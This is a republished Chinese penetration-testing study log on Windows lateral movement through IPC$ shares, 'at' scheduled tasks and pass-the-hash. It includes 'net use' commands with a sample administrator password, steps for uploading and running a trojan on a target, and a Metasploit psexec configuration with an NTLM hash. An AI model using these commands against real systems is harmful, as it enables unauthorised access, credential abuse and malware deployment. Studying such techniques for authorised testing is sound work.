微学网

热门关键词:   as  thinkphp  ecshop  xxx  商务通  www.ymwears.cn
热门: ASP.NET PHP编程 ASP编程 JSP编程 Python

记录内网渗透学习进程--DAY16

发布时间:2021-05-04 来源:未知 点击:
IPC+计划任务进⾏横向移动
IPC
IPC$(Internet Process Connection)是“进程间通信”的简称,其本质是⼀个共享的“命名管道”资源,主要的作⽤是为了让进程间通信而开放⼀个命名管道,通过提供可信任的⽤⼾名和口令,从而到达连接双⽅可以建⽴⼀个安全的通 道并以此进⾏加密数据交换的功能,最终显现出来的效果就是能够实现对远程计算机的访问
基础利⽤条件 1.⽬标开启445端口。 2.已有⽬标凭证

IPC + at
IPC+at on windows 2003\xp
使⽤条件:启动Task Scheduler服务   net use \\10.10.10.4\C$ "877133"/u:"workgroup\Administrator"    # $C表示连接C盘 #IPC表示连接所有盘

 

net use 查看所有的连接

net use #查看所有ipc连接 net use \\<target-ip>\C$/del#删除指定ipc连接 net use * /del /y#删除所有ipc连接

 

 

 

 

上传木马到跳板机

 

 

 

 

复制到目标机

 

 

以定时任务的方式去执行文件

 

at \\<target-ip> 1 /delete #删除at计划任务1,运⾏完成后⼀定要删除计划任务!

 

 

成功上线

 

 TIPS:同一session的不同权限之间能看到的连接都不同, 不同session之间也不同,必须是相同session和相同权限才能看到相同的连接

 

 

当我们没有明文密码时只有哈希值时,可以用msf_psexec模块登陆

use exploit/windows/smb/psexec
set rhosts 192.168.15.181
set smbuser rabbitmask
set smbpass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4




也可以使用pth命令用哈希值来登陆,系统会自动寻找网段里能符合要求的计算机

 

 

依然可以连接上

 

结束后要来清除自身的凭证,否则可以用看到记录的账号密码


 


这就是微学网-程序员之家为你提供的"记录内网渗透学习进程--DAY16"希望对你有所帮助.本文来自网络,转载请注明出处:http://www.weixuecn.cn/article/14359.html
网络编程 | 前端制作 | 数据库 | CMS教程 | 脚本编程 | 框架 | 服务器 | 微信开发 | APP开发 | 学习教程 |

凡本网站转载的文章、图片等资料的版权归版权所有人所有,因无法和版权所有者一一联系,如果本网站选取的文/图威胁到您的权益,请您及时和本网站联系。 我们会在第一时间内采取措施,避免给双方造 成不必要的损失。
© 2015-2021 微学网 版权所有,并保留所有权利。 备案号:粤ICP备09051474号-1

菜鸟学习网,提供各类程序编程入门,技巧